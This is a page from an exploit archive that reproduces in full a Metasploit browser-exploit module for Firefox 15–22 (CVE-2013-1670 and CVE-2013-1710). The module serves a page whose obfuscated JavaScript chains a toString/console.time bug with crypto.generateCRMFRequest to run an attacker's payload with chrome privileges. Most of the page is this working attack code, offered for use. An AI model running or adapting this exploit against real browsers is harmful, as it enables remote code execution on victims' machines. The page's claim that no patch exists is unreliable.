Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Firefox toString console.time Privileged Javascript Injection - exploit.company
header-logo
Suggest Exploit
vendor:
Firefox
by:
moz_bug_r_a4, Cody Crews, joev
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: Firefox
Affected Version From: Firefox 15
Affected Version To: Firefox 22
Patch Exists: NO
Related CWE: CVE-2013-1670, CVE-2013-1710
CPE: a:mozilla:firefox
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2013-1670/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0821/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-1670/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2013-1670/https://www.rapid7.com/db/vulnerabilities/suse-cve-2013-1670/https://www.rapid7.com/db/vulnerabilities/mfsa2013-42-cve-2013-1670/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0820/https://www.rapid7.com/db/vulnerabilities/suse-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-1142/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/mfsa2013-69-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2013-1710/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-1140/
Other Scripts:
Platforms Tested: firefox, java, linux, osx, solaris, win
2013

Firefox toString console.time Privileged Javascript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Mitigation:

Unknown
Source

Exploit-DB raw data:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "15.0",
    :ua_maxver  => "22.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 15-22 by abusing two separate
        Javascript-related vulnerabilities to ultimately inject malicious Javascript code
        into a context running with chrome:// privileges.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'Cody Crews',   # discovered CVE-2013-1670
        'joev' # metasploit module
      ],
      'DisclosureDate' => "May 14 2013",
      'References' => [
        ['CVE', '2013-1670'], # privileged access for content-level constructor
        ['CVE', '2013-1710']  # further chrome injection
      ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];
      var y = {}, q = false;
      y.constructor.prototype.toString=function() {
        if (q) return;
        q = true;
        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
        return 5;
      };
      console.time(y);
    |)

    js.obfuscate

    %Q|
      <!doctype html>
      <html>
        <body>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end

Navigation

Suggest Exploit

Services By CQR